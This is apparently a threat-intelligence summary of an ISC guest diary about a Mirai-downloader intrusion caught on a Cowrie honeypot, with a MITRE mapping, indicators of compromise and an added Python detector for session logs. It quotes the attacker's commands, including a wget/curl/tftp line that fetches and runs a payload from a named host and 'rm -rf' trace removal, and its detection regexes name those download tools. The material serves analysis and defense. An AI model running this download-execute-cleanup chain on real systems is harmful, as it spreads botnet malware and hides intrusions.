Mirai-Mirai On The Wall… [Guest Diary]

An ISC guest diary analyzes a Mirai-based attack captured on a honeypot, highlighting an automated SSH intrusion that downloads a binary named ‘sh’ from a Moscow IP and executes it. The sample is identified as Trojan.Mirai / miraidownloader, with mitigations to secure IoT devices and patch CVEs. #Mirai #miraidownloader #Cowrie #CVE-2023-1389 #CVE-2023-26801 #CVE-2023-23295

Keypoints

  • An attack on an open Internet-emulated IoT device (honeypot) used Cowrie to log a large, automated intrusion focused on downloading a botnet payload.
  • The intrusion involved 51 SSH commands and produced a 177 KB log, indicating a scripted, automated operation.
  • The malware chain downloads a binary called ‘sh’ from a remote IP, then attempts to execute it and remove traces.
  • The downloaded payload is associated with Mirai/Mirai-downloader and is tracked with a SHA-256 hash (b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852).
  • The article maps observed behaviors to MITRE techniques, including Unix shell execution and command obfuscation to evade detection.
  • Mitigation emphasizes changing default IoT passwords, patching CVEs, and avoiding exposure of IoT devices to the Internet.

MITRE Techniques

  • [T1059.004] Command and Scripting Interpreter – Unix Shell – The attacker used 51 SSH commands before the connection was terminated. Quote: (‘the attacker used 51 SSH commands before the connection was terminated.’)
  • [T1105] Ingress Tool Transfer – The chain downloads a file called ‘sh’ from an IP address from Moscow, Russian Federation. Quote: (‘download a file called “sh” from an IP address from Moscow, Russian Federation.’)
  • [T1082] System Information Discovery – The attacker obtained information about the honeypot’s CPU with the following command: cat /proc/cpuinfo || while read i; do echo $i; done
  • [T1070] Indicator Removal on Host – The attacker attempted to remove traces with rm -rf x86; rm -rf sshdmiori. Quote: (‘rm -rf x86; rm -rf sshdmiori’)
  • [T1027.012] Obfuscated/Compressed Files or Information: Command Obfuscation – The article notes obfuscation via hexadecimal commands and explicitly references Obfuscated Files or Information: Command Obfuscation (T1027.12). Quote: (‘Obfuscated Files or Information: Command Obfuscation (T1027.12)’)
  • [T1110] Brute Force – The honeypot is described as a target for open SSH ports with weak credentials (SSH brute-forcing context). Quote: (‘This particular attack scans for open SSH ports attached to devices with weak administrative credentials.’)
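A defender-side check suggested by the observations above, as an added example (not code from the ISC diary or from the Cowrie project): it walks Cowrie-style JSON command events, maps each session's commands to the stages listed here (T1082, T1105, T1059.004, T1070) and flags only sessions that both pull a payload and run or wipe files. Field names (eventid, session, src_ip, input) follow Cowrie's cowrie.command.input records; the sample events and their source addresses are constructed, not taken from the diary's log.

```python
import json
import re
from collections import defaultdict

# Constructed Cowrie-style JSON events (field names follow Cowrie's
# cowrie.command.input records; commands mirror the chain the diary describes).
SAMPLE_LOG = """\
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"198.51.100.7","input":"cat /proc/cpuinfo || while read i; do echo $i; done"}
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"198.51.100.7","input":"wget http://46.29.166.61/sh || curl -O http://46.29.166.61/sh || tftp -g -r sh 46.29.166.61"}
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"198.51.100.7","input":"./sh"}
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"198.51.100.7","input":"rm -rf x86; rm -rf sshdmiori"}
{"eventid":"cowrie.command.input","session":"c3d4","src_ip":"203.0.113.9","input":"uname -a"}
"""

# Stage name -> (MITRE technique, regex applied to the raw command line)
STAGES = {
    "discovery": ("T1082", re.compile(r"/proc/cpuinfo|\buname\b")),
    "ingress":   ("T1105", re.compile(r"\b(wget|curl|tftp)\b.*\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    "execute":   ("T1059.004", re.compile(r"(^|[;&|]\s*)\./\S+")),
    "cleanup":   ("T1070", re.compile(r"\brm\s+-rf?\b")),
}
URL_RE = re.compile(r"(?:https?|tftp)://\S+")

def analyze(log_text):
    """Group command events by session; record the stages hit and any download URLs."""
    sessions = defaultdict(lambda: {"src_ip": None, "stages": {}, "urls": set()})
    for line in log_text.splitlines():
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue  # ignore connect/login/close records
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip")
        cmd = ev.get("input", "")
        for stage, (tid, rx) in STAGES.items():
            if rx.search(cmd):
                s["stages"][stage] = tid
        s["urls"].update(URL_RE.findall(cmd))
    return sessions

def flag_chains(sessions):
    """Flag a session only when it pulls a payload AND runs or wipes files."""
    return sorted(sid for sid, s in sessions.items()
                  if "ingress" in s["stages"] and {"execute", "cleanup"} & set(s["stages"]))

if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for sid in flag_chains(found):
        s = found[sid]
        print(sid, s["src_ip"], sorted(s["stages"].values()), sorted(s["urls"]))
```

The lone `uname -a` session is recorded as discovery only and is not flagged, so the check separates recon-only probes from a full download-execute-cleanup chain.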

Indicators of Compromise

  • [IP Address] – 46.29.166.61 (used as the download/source for the malicious payload via wget/curl/tftp). Example: http://46.29.166[.]61/sh
  • [URL] – http://46.29.166.61/sh (download URI used by the attacker)
  • [File name] – sh (binary downloaded and executed); x86 (intermediate file where hexadecimal data was assembled)
  • [SHA256] – b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
  • [Note] – Mirai / miraidownloader (malware family) referenced in multiple databases

Read more: https://isc.sans.edu/diary/MiraiMirai+On+The+Wall+Guest+Diary/30658